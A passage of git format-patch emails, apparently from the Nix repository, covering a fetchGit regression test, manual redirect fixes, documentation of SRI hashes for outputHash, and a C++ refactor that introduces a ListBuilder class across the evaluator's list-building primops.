 path=$(nix eval --impure --raw --expr "(builtins.fetchGit file://$repo).outPath")
 [[ $(cat $path/hello) = world ]]
 
+# Fetch when the cache has packed-refs
+# Regression test of #8822
+git -C $TEST_HOME/.cache/nix/gitv3/*/ pack-refs --all
+path=$(nix eval --impure --raw --expr "(builtins.fetchGit file://$repo).outPath")
+
 # Fetch a rev from another branch
 git -C $repo checkout -b devtest
 echo "different file" >> $TEST_ROOT/git/differentbranch
@@ -251,6 +259,7 @@ path12=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = file://$repo
 
 # should fail if there is no repo
 rm -rf $repo/.git
+rm -rf $TEST_HOME/.cache/nix
 (! nix eval --impure --raw --expr "(builtins.fetchGit \"file://$repo\").outPath")
 
 # should succeed for a repo without commits

From 3754614b9cd2d1a16cbc3eb4c8011c32918c4baa Mon Sep 17 00:00:00 2001
From: Valentin Gagarin 
Date: Thu, 14 Mar 2024 15:01:47 +0100
Subject: [PATCH 624/654] adjust anchor redirects to point to new pages

a previous moving of files accounted for server-side redirects, but not
client-side redirects.
---
 doc/manual/redirects.js | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/doc/manual/redirects.js b/doc/manual/redirects.js
index 28b80f589..25648969d 100644
--- a/doc/manual/redirects.js
+++ b/doc/manual/redirects.js
@@ -14,7 +14,7 @@
 
 const redirects = {
  "index.html": {
-    "part-advanced-topics": "advanced-topics/advanced-topics.html",
+    "part-advanced-topics": "advanced-topics/index.html",
     "chap-tuning-cores-and-jobs": "advanced-topics/cores-vs-jobs.html",
     "chap-diff-hook": "advanced-topics/diff-hook.html",
     "check-dirs-are-unregistered": "advanced-topics/diff-hook.html#check-dirs-are-unregistered",
@@ -22,7 +22,7 @@ const redirects = {
     "chap-post-build-hook": "advanced-topics/post-build-hook.html",
     "chap-post-build-hook-caveats": "advanced-topics/post-build-hook.html#implementation-caveats",
     "chap-writing-nix-expressions": "language/index.html",
-    "part-command-ref": "command-ref/command-ref.html",
+    "part-command-ref": "command-ref/index.html",
     "conf-allow-import-from-derivation": "command-ref/conf-file.html#conf-allow-import-from-derivation",
     "conf-allow-new-privileges": "command-ref/conf-file.html#conf-allow-new-privileges",
     "conf-allowed-uris": "command-ref/conf-file.html#conf-allowed-uris",
@@ -261,7 +261,7 @@ const redirects = {
     "sec-installer-proxy-settings": "installation/env-variables.html#proxy-environment-variables",
     "sec-nix-ssl-cert-file": "installation/env-variables.html#nix_ssl_cert_file",
     "sec-nix-ssl-cert-file-with-nix-daemon-and-macos": "installation/env-variables.html#nix_ssl_cert_file-with-macos-and-the-nix-daemon",
-    "chap-installation": "installation/installation.html",
+    "chap-installation": "installation/index.html",
     "ch-installing-binary": "installation/installing-binary.html",
     "sect-macos-installation": "installation/installing-binary.html#macos-installation",
     "sect-macos-installation-change-store-prefix": "installation/installing-binary.html#macos-installation",
@@ -288,7 +288,7 @@ const redirects = {
     "ssec-copy-closure": "package-management/copy-closure.html",
     "sec-garbage-collection": "package-management/garbage-collection.html",
     "ssec-gc-roots": "package-management/garbage-collector-roots.html",
-    "chap-package-management": "package-management/package-management.html",
+    "chap-package-management": "package-management/index.html",
     "sec-profiles": "package-management/profiles.html",
     "ssec-s3-substituter": "package-management/s3-substituter.html",
     "ssec-s3-substituter-anonymous-reads": "package-management/s3-substituter.html#anonymous-reads-to-your-s3-compatible-binary-cache",
@@ -297,7 +297,7 @@ const redirects = {
     "sec-sharing-packages": "package-management/sharing-packages.html",
     "ssec-ssh-substituter": "package-management/ssh-substituter.html",
     "chap-quick-start": "quick-start.html",
-    "sec-relnotes": "release-notes/release-notes.html",
+    "sec-relnotes": "release-notes/index.html",
     "ch-relnotes-0.10.1": "release-notes/rl-0.10.1.html",
     "ch-relnotes-0.10": "release-notes/rl-0.10.html",
     "ssec-relnotes-0.11": "release-notes/rl-0.11.html",

From a50295425ea205863ef41f66cfbe9c01937ebd08 Mon Sep 17 00:00:00 2001
From: Dimitar Nestorov <8790386+DimitarNestorov@users.noreply.github.com>
Date: Thu, 14 Mar 2024 16:15:52 +0200
Subject: [PATCH 625/654] docs: update registry examples

When you run `nix flake info` you get a deprecated message
---
 src/nix/registry-pin.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/src/nix/registry-pin.md b/src/nix/registry-pin.md
index ebc0e3eff..5ad4f8709 100644
--- a/src/nix/registry-pin.md
+++ b/src/nix/registry-pin.md
@@ -15,10 +15,10 @@ R""(
   user   flake:nixpkgs github:NixOS/nixpkgs/925b70cd964ceaedee26fde9b19cc4c4f081196a
   ```
 
-  and `nix flake info` will say:
+  and `nix flake metadata` will say:
 
   ```console
-  # nix flake info nixpkgs
+  # nix flake metadata nixpkgs
   Resolved URL:  github:NixOS/nixpkgs/925b70cd964ceaedee26fde9b19cc4c4f081196a
   Locked URL:    github:NixOS/nixpkgs/925b70cd964ceaedee26fde9b19cc4c4f081196a
   …

From 49e9efeaaaf4546f8daa2e33dd5191a2c288f737 Mon Sep 17 00:00:00 2001
From: Daniel Sidhion 
Date: Thu, 14 Mar 2024 23:09:47 -0700
Subject: [PATCH 626/654] doc: document SRI hash format for `outputHash`
 (#10230)

---
 doc/manual/src/language/advanced-attributes.md | 15 +++++++--------
 1 file changed, 7 insertions(+), 8 deletions(-)

diff --git a/doc/manual/src/language/advanced-attributes.md b/doc/manual/src/language/advanced-attributes.md
index 7306fc182..b3e3afe3b 100644
--- a/doc/manual/src/language/advanced-attributes.md
+++ b/doc/manual/src/language/advanced-attributes.md
@@ -188,9 +188,13 @@ Derivations can declare some infrequently used optional attributes.
     }
     ```
 
-    The `outputHashAlgo` attribute specifies the hash algorithm used to
-    compute the hash. It can currently be `"sha1"`, `"sha256"` or
-    `"sha512"`.
+    The `outputHash` attribute must be a string containing the hash in either hexadecimal or "nix32" encoding, or following the format for integrity metadata as defined by [SRI](https://www.w3.org/TR/SRI/).
+    The "nix32" encoding is an adaptation of base-32 encoding.
+    The [`convertHash`](@docroot@/language/builtins.md#builtins-convertHash) function shows how to convert between different encodings, and the [`nix-hash` command](../command-ref/nix-hash.md) has information about obtaining the hash for some contents, as well as converting to and from encodings.
+
+    The `outputHashAlgo` attribute specifies the hash algorithm used to compute the hash.
+    It can currently be `"sha1"`, `"sha256"`, `"sha512"`, or `null`.
+    `outputHashAlgo` can only be `null` when `outputHash` follows the SRI format.
 
     The `outputHashMode` attribute determines how the hash is computed.
     It must be one of the following two values:
@@ -209,11 +213,6 @@ Derivations can declare some infrequently used optional attributes.
         this case, the output can be anything, including a directory
         tree.
 
-    The `outputHash` attribute, finally, must be a string containing
-    the hash in either hexadecimal or base-32 notation. (See the
-    [`nix-hash` command](../command-ref/nix-hash.md) for information
-    about converting to and from base-32 notation.)
-
   - [`__contentAddressed`]{#adv-attr-__contentAddressed}
     > **Warning**
     > This attribute is part of an [experimental feature](@docroot@/contributing/experimental-features.md).

From fecff520d7ce6598319862efc50c2dc6e1f6e9d9 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Thu, 14 Mar 2024 19:10:31 +0100
Subject: [PATCH 627/654] Add a ListBuilder helper for constructing list values

Previously, `state.mkList()` would set the type of the value to tList
and allocate the list vector, but it would not initialize the values
in the list. This has two problems:

* If an exception occurs, the list is left in an undefined state.

* More importantly, for multithreaded evaluation, if a value
  transitions from thunk to non-thunk, it should be final (i.e. other
  threads should be able to access the value safely).

To address this, there now is a `ListBuilder` class (analogous to
`BindingsBuilder`) to build the list vector prior to the call to
`Value::mkList()`. Typical usage:

   auto list = state.buildList(size);
   for (auto & v : list)
       v = ... set value ...;
   vRes.mkList(list);
---
 src/libexpr/eval.cc               |  24 ++--
 src/libexpr/eval.hh               |  12 +-
 src/libexpr/json-to-value.cc      |   9 +-
 src/libexpr/primops.cc            | 202 ++++++++++++++++--------------
 src/libexpr/primops/context.cc    |   6 +-
 src/libexpr/primops/fromTOML.cc   |   8 +-
 src/libexpr/value.hh              |  43 ++++++-
 src/nix-env/nix-env.cc            |   2 +-
 src/nix-env/user-env.cc           |  17 +--
 tests/unit/libexpr/value/print.cc |  62 +++++----
 10 files changed, 228 insertions(+), 157 deletions(-)

diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index bbccfcd29..297832818 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -435,7 +435,8 @@ EvalState::EvalState(
 
     static_assert(sizeof(Env) <= 16, "environment must be <= 16 bytes");
 
-    vEmptyList.mkList(0);
+    vEmptyList.mkList(buildList(0));
+    vNull.mkNull();
 
     /* Initialise the Nix expression search path. */
     if (!evalSettings.pureEval) {
@@ -923,12 +924,11 @@ inline Value * EvalState::lookupVar(Env * env, const ExprVar & var, bool noEval)
     }
 }
 
-void EvalState::mkList(Value & v, size_t size)
+ListBuilder::ListBuilder(EvalState & state, size_t size)
+    : size(size)
+    , elems(size <= 2 ? inlineElems : (Value * *) allocBytes(size * sizeof(Value *)))
 {
-    v.mkList(size);
-    if (size > 2)
-        v.bigList.elems = (Value * *) allocBytes(size * sizeof(Value *));
-    nrListElems += size;
+    state.nrListElems += size;
 }
 
 
@@ -1353,9 +1353,10 @@ void ExprLet::eval(EvalState & state, Env & env, Value & v)
 
 void ExprList::eval(EvalState & state, Env & env, Value & v)
 {
-    state.mkList(v, elems.size());
-    for (auto [n, v2] : enumerate(v.listItems()))
-        const_cast(v2) = elems[n]->maybeThunk(state, env);
+    auto list = state.buildList(elems.size());
+    for (const auto & [n, v2] : enumerate(list))
+        v2 = elems[n]->maybeThunk(state, env);
+    v.mkList(list);
 }
 
 
@@ -1963,14 +1964,15 @@ void EvalState::concatLists(Value & v, size_t nrLists, Value * * lists, const Po
         return;
     }
 
-    mkList(v, len);
-    auto out = v.listElems();
+    auto list = buildList(len);
+    auto out = list.elems;
     for (size_t n = 0, pos = 0; n < nrLists; ++n) {
         auto l = lists[n]->listSize();
         if (l)
             memcpy(out + pos, lists[n]->listElems(), l * sizeof(Value *));
         pos += l;
     }
+    v.mkList(list);
 }
 
 
diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh
index 368bb17b3..4a271f4ef 100644
--- a/src/libexpr/eval.hh
+++ b/src/libexpr/eval.hh
@@ -186,6 +186,11 @@ public:
      */
     Value vEmptyList;
 
+    /**
+     * Null constant.
+     */
+    Value vNull;
+
     /**
      * The accessor for the root filesystem.
      */
@@ -615,7 +620,11 @@ public:
         return BindingsBuilder(*this, allocBindings(capacity));
     }
 
-    void mkList(Value & v, size_t length);
+    ListBuilder buildList(size_t size)
+    {
+        return ListBuilder(*this, size);
+    }
+
     void mkThunk_(Value & v, Expr * expr);
     void mkPos(Value & v, PosIdx pos);
 
@@ -756,6 +765,7 @@ private:
     friend void prim_split(EvalState & state, const PosIdx pos, Value * * args, Value & v);
 
     friend struct Value;
+    friend class ListBuilder;
 };
 
 struct DebugTraceStacker {
diff --git a/src/libexpr/json-to-value.cc b/src/libexpr/json-to-value.cc
index 2d12c47c5..20bee193f 100644
--- a/src/libexpr/json-to-value.cc
+++ b/src/libexpr/json-to-value.cc
@@ -57,11 +57,10 @@ class JSONSax : nlohmann::json_sax {
         ValueVector values;
         std::unique_ptr resolve(EvalState & state) override
         {
-            Value & v = parent->value(state);
-            state.mkList(v, values.size());
-            for (size_t n = 0; n < values.size(); ++n) {
-                v.listElems()[n] = values[n];
-            }
+            auto list = state.buildList(values.size());
+            for (const auto & [n, v2] : enumerate(list))
+                v2 = values[n];
+            parent->value(state).mkList(list);
             return std::move(parent);
         }
         void add() override {
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index bc2a70496..32913d72e 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -187,13 +187,13 @@ static void import(EvalState & state, const PosIdx pos, Value & vPath, Value * v
             NixStringContextElem::DrvDeep { .drvPath = *storePath },
         });
         attrs.alloc(state.sName).mkString(drv.env["name"]);
-        auto & outputsVal = attrs.alloc(state.sOutputs);
-        state.mkList(outputsVal, drv.outputs.size());
 
+        auto list = state.buildList(drv.outputs.size());
         for (const auto & [i, o] : enumerate(drv.outputs)) {
             mkOutputString(state, attrs, *storePath, o);
-            (outputsVal.listElems()[i] = state.allocValue())->mkString(o.first);
+            (list[i] = state.allocValue())->mkString(o.first);
         }
+        attrs.alloc(state.sOutputs).mkList(list);
 
         auto w = state.allocValue();
         w->mkAttrs(attrs);
@@ -694,10 +694,10 @@ static void prim_genericClosure(EvalState & state, const PosIdx pos, Value * * a
     }
 
     /* Create the result list. */
-    state.mkList(v, res.size());
-    unsigned int n = 0;
-    for (auto & i : res)
-        v.listElems()[n++] = i;
+    auto list = state.buildList(res.size());
+    for (const auto & [n, i] : enumerate(res))
+        list[n] = i;
+    v.mkList(list);
 }
 
 static RegisterPrimOp primop_genericClosure(PrimOp {
@@ -2423,14 +2423,15 @@ static void prim_attrNames(EvalState & state, const PosIdx pos, Value * * args,
 {
     state.forceAttrs(*args[0], pos, "while evaluating the argument passed to builtins.attrNames");
 
-    state.mkList(v, args[0]->attrs->size());
+    auto list = state.buildList(args[0]->attrs->size());
 
-    size_t n = 0;
-    for (auto & i : *args[0]->attrs)
-        (v.listElems()[n++] = state.allocValue())->mkString(state.symbols[i.name]);
+    for (const auto & [n, i] : enumerate(*args[0]->attrs))
+        (list[n] = state.allocValue())->mkString(state.symbols[i.name]);
 
-    std::sort(v.listElems(), v.listElems() + n,
+    std::sort(list.begin(), list.end(),
               [](Value * v1, Value * v2) { return strcmp(v1->c_str(), v2->c_str()) < 0; });
+
+    v.mkList(list);
 }
 
 static RegisterPrimOp primop_attrNames({
@@ -2450,21 +2451,22 @@ static void prim_attrValues(EvalState & state, const PosIdx pos, Value * * args,
 {
     state.forceAttrs(*args[0], pos, "while evaluating the argument passed to builtins.attrValues");
 
-    state.mkList(v, args[0]->attrs->size());
+    auto list = state.buildList(args[0]->attrs->size());
 
-    unsigned int n = 0;
-    for (auto & i : *args[0]->attrs)
-        v.listElems()[n++] = (Value *) &i;
+    for (const auto & [n, i] : enumerate(*args[0]->attrs))
+        list[n] = (Value *) &i;
 
-    std::sort(v.listElems(), v.listElems() + n,
+    std::sort(list.begin(), list.end(),
         [&](Value * v1, Value * v2) {
             std::string_view s1 = state.symbols[((Attr *) v1)->name],
                 s2 = state.symbols[((Attr *) v2)->name];
             return s1 < s2;
         });
 
-    for (unsigned int i = 0; i < n; ++i)
-        v.listElems()[i] = ((Attr *) v.listElems()[i])->value;
+    for (auto & v : list)
+        v = ((Attr *) v)->value;
+
+    v.mkList(list);
 }
 
 static RegisterPrimOp primop_attrValues({
@@ -2805,9 +2807,10 @@ static void prim_catAttrs(EvalState & state, const PosIdx pos, Value * * args, V
             res[found++] = i->value;
     }
 
-    state.mkList(v, found);
+    auto list = state.buildList(found);
     for (unsigned int n = 0; n < found; ++n)
-        v.listElems()[n] = res[n];
+        list[n] = res[n];
+    v.mkList(list);
 }
 
 static RegisterPrimOp primop_catAttrs({
@@ -2908,43 +2911,50 @@ static void prim_zipAttrsWith(EvalState & state, const PosIdx pos, Value * * arg
     // attribute with the merge function application. this way we need not
     // use (slightly slower) temporary storage the GC does not know about.
 
-    std::map> attrsSeen;
+    struct Item
+    {
+        size_t size = 0;
+        size_t pos = 0;
+        std::optional list;
+    };
+
+    std::map attrsSeen;
 
     state.forceFunction(*args[0], pos, "while evaluating the first argument passed to builtins.zipAttrsWith");
     state.forceList(*args[1], pos, "while evaluating the second argument passed to builtins.zipAttrsWith");
-    const auto listSize = args[1]->listSize();
-    const auto listElems = args[1]->listElems();
+    const auto listItems = args[1]->listItems();
 
-    for (unsigned int n = 0; n < listSize; ++n) {
-        Value * vElem = listElems[n];
+    for (auto & vElem : listItems) {
         state.forceAttrs(*vElem, noPos, "while evaluating a value of the list passed as second argument to builtins.zipAttrsWith");
         for (auto & attr : *vElem->attrs)
-            attrsSeen[attr.name].first++;
+            attrsSeen.try_emplace(attr.name).first->second.size++;
+    }
+
+    for (auto & [sym, elem] : attrsSeen)
+        elem.list.emplace(state.buildList(elem.size));
+
+    for (auto & vElem : listItems) {
+        for (auto & attr : *vElem->attrs) {
+            auto & item = attrsSeen.at(attr.name);
+            (*item.list)[item.pos++] = attr.value;
+        }
     }
 
     auto attrs = state.buildBindings(attrsSeen.size());
+
     for (auto & [sym, elem] : attrsSeen) {
-        auto & list = attrs.alloc(sym);
-        state.mkList(list, elem.first);
-        elem.second = list.listElems();
-    }
-    v.mkAttrs(attrs.alreadySorted());
-
-    for (unsigned int n = 0; n < listSize; ++n) {
-        Value * vElem = listElems[n];
-        for (auto & attr : *vElem->attrs)
-            *attrsSeen[attr.name].second++ = attr.value;
-    }
-
-    for (auto & attr : *v.attrs) {
         auto name = state.allocValue();
-        name->mkString(state.symbols[attr.name]);
+        name->mkString(state.symbols[sym]);
         auto call1 = state.allocValue();
         call1->mkApp(args[0], name);
         auto call2 = state.allocValue();
-        call2->mkApp(call1, attr.value);
-        attr.value = call2;
+        auto arg = state.allocValue();
+        arg->mkList(*elem.list);
+        call2->mkApp(call1, arg);
+        attrs.insert(sym, call2);
     }
+
+    v.mkAttrs(attrs.alreadySorted());
 }
 
 static RegisterPrimOp primop_zipAttrsWith({
@@ -3055,9 +3065,10 @@ static void prim_tail(EvalState & state, const PosIdx pos, Value * * args, Value
     if (args[0]->listSize() == 0)
         state.error("'tail' called on an empty list").atPos(pos).debugThrow();
 
-    state.mkList(v, args[0]->listSize() - 1);
-    for (unsigned int n = 0; n < v.listSize(); ++n)
-        v.listElems()[n] = args[0]->listElems()[n + 1];
+    auto list = state.buildList(args[0]->listSize() - 1);
+    for (const auto & [n, v] : enumerate(list))
+        v = args[0]->listElems()[n + 1];
+    v.mkList(list);
 }
 
 static RegisterPrimOp primop_tail({
@@ -3088,10 +3099,11 @@ static void prim_map(EvalState & state, const PosIdx pos, Value * * args, Value
 
     state.forceFunction(*args[0], pos, "while evaluating the first argument passed to builtins.map");
 
-    state.mkList(v, args[1]->listSize());
-    for (unsigned int n = 0; n < v.listSize(); ++n)
-        (v.listElems()[n] = state.allocValue())->mkApp(
+    auto list = state.buildList(args[1]->listSize());
+    for (const auto & [n, v] : enumerate(list))
+        (v = state.allocValue())->mkApp(
             args[0], args[1]->listElems()[n]);
+    v.mkList(list);
 }
 
 static RegisterPrimOp primop_map({
@@ -3140,8 +3152,9 @@ static void prim_filter(EvalState & state, const PosIdx pos, Value * * args, Val
     if (same)
         v = *args[1];
     else {
-        state.mkList(v, k);
-        for (unsigned int n = 0; n < k; ++n) v.listElems()[n] = vs[n];
+        auto list = state.buildList(k);
+        for (const auto & [n, v] : enumerate(list)) v = vs[n];
+        v.mkList(list);
     }
 }
 
@@ -3316,12 +3329,13 @@ static void prim_genList(EvalState & state, const PosIdx pos, Value * * args, Va
     // as evaluating map without accessing any values makes little sense.
     state.forceFunction(*args[0], noPos, "while evaluating the first argument passed to builtins.genList");
 
-    state.mkList(v, len);
-    for (unsigned int n = 0; n < (unsigned int) len; ++n) {
+    auto list = state.buildList(len);
+    for (const auto & [n, v] : enumerate(list)) {
         auto arg = state.allocValue();
         arg->mkInt(n);
-        (v.listElems()[n] = state.allocValue())->mkApp(args[0], arg);
+        (v = state.allocValue())->mkApp(args[0], arg);
     }
+    v.mkList(list);
 }
 
 static RegisterPrimOp primop_genList({
@@ -3355,11 +3369,10 @@ static void prim_sort(EvalState & state, const PosIdx pos, Value * * args, Value
 
     state.forceFunction(*args[0], pos, "while evaluating the first argument passed to builtins.sort");
 
-    state.mkList(v, len);
-    for (unsigned int n = 0; n < len; ++n) {
-        state.forceValue(*args[1]->listElems()[n], pos);
-        v.listElems()[n] = args[1]->listElems()[n];
-    }
+    auto list = state.buildList(len);
+    for (const auto & [n, v] : enumerate(list))
+        state.forceValue(*(v = args[1]->listElems()[n]), pos);
+    v.mkList(list);
 
     auto comparator = [&](Value * a, Value * b) {
         /* Optimization: if the comparator is lessThan, bypass
@@ -3424,17 +3437,17 @@ static void prim_partition(EvalState & state, const PosIdx pos, Value * * args,
 
     auto attrs = state.buildBindings(2);
 
-    auto & vRight = attrs.alloc(state.sRight);
     auto rsize = right.size();
-    state.mkList(vRight, rsize);
+    auto rlist = state.buildList(rsize);
     if (rsize)
-        memcpy(vRight.listElems(), right.data(), sizeof(Value *) * rsize);
+        memcpy(rlist.elems, right.data(), sizeof(Value *) * rsize);
+    attrs.alloc(state.sRight).mkList(rlist);
 
-    auto & vWrong = attrs.alloc(state.sWrong);
     auto wsize = wrong.size();
-    state.mkList(vWrong, wsize);
+    auto wlist = state.buildList(wsize);
     if (wsize)
-        memcpy(vWrong.listElems(), wrong.data(), sizeof(Value *) * wsize);
+        memcpy(wlist.elems, wrong.data(), sizeof(Value *) * wsize);
+    attrs.alloc(state.sWrong).mkList(wlist);
 
     v.mkAttrs(attrs);
 }
@@ -3481,10 +3494,10 @@ static void prim_groupBy(EvalState & state, const PosIdx pos, Value * * args, Va
     auto attrs2 = state.buildBindings(attrs.size());
 
     for (auto & i : attrs) {
-        auto & list = attrs2.alloc(i.first);
         auto size = i.second.size();
-        state.mkList(list, size);
-        memcpy(list.listElems(), i.second.data(), sizeof(Value *) * size);
+        auto list = state.buildList(size);
+        memcpy(list.elems, i.second.data(), sizeof(Value *) * size);
+        attrs2.alloc(i.first).mkList(list);
     }
 
     v.mkAttrs(attrs2.alreadySorted());
@@ -3531,14 +3544,15 @@ static void prim_concatMap(EvalState & state, const PosIdx pos, Value * * args,
         len += lists[n].listSize();
     }
 
-    state.mkList(v, len);
-    auto out = v.listElems();
+    auto list = state.buildList(len);
+    auto out = list.elems;
     for (unsigned int n = 0, pos = 0; n < nrLists; ++n) {
         auto l = lists[n].listSize();
         if (l)
             memcpy(out + pos, lists[n].listElems(), l * sizeof(Value *));
         pos += l;
     }
+    v.mkList(list);
 }
 
 static RegisterPrimOp primop_concatMap({
@@ -3986,14 +4000,13 @@ void prim_match(EvalState & state, const PosIdx pos, Value * * args, Value & v)
         }
 
         // the first match is the whole string
-        const size_t len = match.size() - 1;
-        state.mkList(v, len);
-        for (size_t i = 0; i < len; ++i) {
-            if (!match[i+1].matched)
-                (v.listElems()[i] = state.allocValue())->mkNull();
+        auto list = state.buildList(match.size() - 1);
+        for (const auto & [i, v2] : enumerate(list))
+            if (!match[i + 1].matched)
+                (v2 = state.allocValue())->mkNull();
             else
-                (v.listElems()[i] = state.allocValue())->mkString(match[i + 1].str());
-        }
+                (v2 = state.allocValue())->mkString(match[i + 1].str());
+        v.mkList(list);
 
     } catch (std::regex_error & e) {
         if (e.code() == std::regex_constants::error_space) {
@@ -4062,11 +4075,12 @@ void prim_split(EvalState & state, const PosIdx pos, Value * * args, Value & v)
 
         // Any matches results are surrounded by non-matching results.
         const size_t len = std::distance(begin, end);
-        state.mkList(v, 2 * len + 1);
+        auto list = state.buildList(2 * len + 1);
         size_t idx = 0;
 
         if (len == 0) {
-            v.listElems()[idx++] = args[1];
+            list[0] = args[1];
+            v.mkList(list);
             return;
         }
 
@@ -4075,28 +4089,31 @@ void prim_split(EvalState & state, const PosIdx pos, Value * * args, Value & v)
             auto match = *i;
 
             // Add a string for non-matched characters.
-            (v.listElems()[idx++] = state.allocValue())->mkString(match.prefix().str());
+            (list[idx++] = state.allocValue())->mkString(match.prefix().str());
 
             // Add a list for matched substrings.
             const size_t slen = match.size() - 1;
-            auto elem = v.listElems()[idx++] = state.allocValue();
 
             // Start at 1, beacause the first match is the whole string.
-            state.mkList(*elem, slen);
-            for (size_t si = 0; si < slen; ++si) {
+            auto list2 = state.buildList(slen);
+            for (const auto & [si, v2] : enumerate(list2)) {
                 if (!match[si + 1].matched)
-                    (elem->listElems()[si] = state.allocValue())->mkNull();
+                    v2 = &state.vNull;
                 else
-                    (elem->listElems()[si] = state.allocValue())->mkString(match[si + 1].str());
+                    (v2 = state.allocValue())->mkString(match[si + 1].str());
             }
 
+            (list[idx++] = state.allocValue())->mkList(list2);
+
             // Add a string for non-matched suffix characters.
             if (idx == 2 * len)
-                (v.listElems()[idx++] = state.allocValue())->mkString(match.suffix().str());
+                (list[idx++] = state.allocValue())->mkString(match.suffix().str());
         }
 
         assert(idx == 2 * len + 1);
 
+        v.mkList(list);
+
     } catch (std::regex_error & e) {
         if (e.code() == std::regex_constants::error_space) {
             // limit is _GLIBCXX_REGEX_STATE_LIMIT for libstdc++
@@ -4316,9 +4333,10 @@ static void prim_splitVersion(EvalState & state, const PosIdx pos, Value * * arg
             break;
         components.emplace_back(component);
     }
-    state.mkList(v, components.size());
+    auto list = state.buildList(components.size());
     for (const auto & [n, component] : enumerate(components))
-        (v.listElems()[n] = state.allocValue())->mkString(std::move(component));
+        (list[n] = state.allocValue())->mkString(std::move(component));
+    v.mkList(list);
 }
 
 static RegisterPrimOp primop_splitVersion({
@@ -4559,14 +4577,14 @@ void EvalState::createBaseEnv()
     });
 
     /* Add a value containing the current Nix expression search path. */
-    mkList(v, searchPath.elements.size());
-    int n = 0;
-    for (auto & i : searchPath.elements) {
+    auto list = buildList(searchPath.elements.size());
+    for (const auto & [n, i] : enumerate(searchPath.elements)) {
         auto attrs = buildBindings(2);
         attrs.alloc("path").mkString(i.path.s);
         attrs.alloc("prefix").mkString(i.prefix.s);
-        (v.listElems()[n++] = allocValue())->mkAttrs(attrs);
+        (list[n] = allocValue())->mkAttrs(attrs);
     }
+    v.mkList(list);
     addConstant("__nixPath", v, {
         .type = nList,
         .doc = R"(
diff --git a/src/libexpr/primops/context.cc b/src/libexpr/primops/context.cc
index 1eec8b316..4d000b2ce 100644
--- a/src/libexpr/primops/context.cc
+++ b/src/libexpr/primops/context.cc
@@ -207,10 +207,10 @@ static void prim_getContext(EvalState & state, const PosIdx pos, Value * * args,
         if (info.second.allOutputs)
             infoAttrs.alloc(sAllOutputs).mkBool(true);
         if (!info.second.outputs.empty()) {
-            auto & outputsVal = infoAttrs.alloc(state.sOutputs);
-            state.mkList(outputsVal, info.second.outputs.size());
+            auto list = state.buildList(info.second.outputs.size());
             for (const auto & [i, output] : enumerate(info.second.outputs))
-                (outputsVal.listElems()[i] = state.allocValue())->mkString(output);
+                (list[i] = state.allocValue())->mkString(output);
+            infoAttrs.alloc(state.sOutputs).mkList(list);
         }
         attrs.alloc(state.store->printStorePath(info.first)).mkAttrs(infoAttrs);
     }
diff --git a/src/libexpr/primops/fromTOML.cc b/src/libexpr/primops/fromTOML.cc
index 94be7960a..9bee8ca38 100644
--- a/src/libexpr/primops/fromTOML.cc
+++ b/src/libexpr/primops/fromTOML.cc
@@ -38,10 +38,10 @@ static void prim_fromTOML(EvalState & state, const PosIdx pos, Value * * args, V
                 {
                     auto array = toml::get>(t);
 
-                    size_t size = array.size();
-                    state.mkList(v, size);
-                    for (size_t i = 0; i < size; ++i)
-                        visit(*(v.listElems()[i] = state.allocValue()), array[i]);
+                    auto list = state.buildList(array.size());
+                    for (const auto & [n, v] : enumerate(list))
+                        visit(*(v = state.allocValue()), array[n]);
+                    v.mkList(list);
                 }
                 break;;
             case toml::value_t::boolean:
diff --git a/src/libexpr/value.hh b/src/libexpr/value.hh
index e7aea4949..9f0600efb 100644
--- a/src/libexpr/value.hh
+++ b/src/libexpr/value.hh
@@ -18,6 +18,7 @@
 
 namespace nix {
 
+struct Value;
 class BindingsBuilder;
 
 
@@ -134,6 +135,34 @@ class ExternalValueBase
 std::ostream & operator << (std::ostream & str, const ExternalValueBase & v);
 
 
+class ListBuilder
+{
+    const size_t size;
+    Value * inlineElems[2] = {nullptr, nullptr};
+public:
+    Value * * elems;
+    ListBuilder(EvalState & state, size_t size);
+
+    ListBuilder(ListBuilder && x)
+        : size(x.size)
+        , inlineElems{x.inlineElems[0], x.inlineElems[1]}
+        , elems(size <= 2 ? inlineElems : x.elems)
+    { }
+
+    Value * & operator [](size_t n)
+    {
+        return elems[n];
+    }
+
+    typedef Value * * iterator;
+
+    iterator begin() { return &elems[0]; }
+    iterator end() { return &elems[size]; }
+
+    friend class Value;
+};
+
+
 struct Value
 {
 private:
@@ -323,16 +352,20 @@ public:
 
     Value & mkAttrs(BindingsBuilder & bindings);
 
-    inline void mkList(size_t size)
+    void mkList(const ListBuilder & builder)
     {
         clearValue();
-        if (size == 1)
+        if (builder.size == 1) {
+            smallList[0] = builder.inlineElems[0];
             internalType = tList1;
-        else if (size == 2)
+        } else if (builder.size == 2) {
+            smallList[0] = builder.inlineElems[0];
+            smallList[1] = builder.inlineElems[1];
             internalType = tList2;
-        else {
+        } else {
+            bigList.size = builder.size;
+            bigList.elems = builder.elems;
             internalType = tListN;
-            bigList.size = size;
         }
     }
 
diff --git a/src/nix-env/nix-env.cc b/src/nix-env/nix-env.cc
index 5e3de20c5..f79755375 100644
--- a/src/nix-env/nix-env.cc
+++ b/src/nix-env/nix-env.cc
@@ -172,7 +172,7 @@ static void loadSourceExpr(EvalState & state, const SourcePath & path, Value & v
        directory). */
     else if (st.type == InputAccessor::tDirectory) {
         auto attrs = state.buildBindings(maxAttrs);
-        state.mkList(attrs.alloc("_combineChannels"), 0);
+        attrs.insert(state.symbols.create("_combineChannels"), &state.vEmptyList);
         StringSet seen;
         getAllExprs(state, path, seen, attrs);
         v.mkAttrs(attrs);
diff --git a/src/nix-env/user-env.cc b/src/nix-env/user-env.cc
index 8bebe2b9e..dd27344aa 100644
--- a/src/nix-env/user-env.cc
+++ b/src/nix-env/user-env.cc
@@ -49,10 +49,8 @@ bool createUserEnv(EvalState & state, PackageInfos & elems,
 
     /* Construct the whole top level derivation. */
     StorePathSet references;
-    Value manifest;
-    state.mkList(manifest, elems.size());
-    size_t n = 0;
-    for (auto & i : elems) {
+    auto list = state.buildList(elems.size());
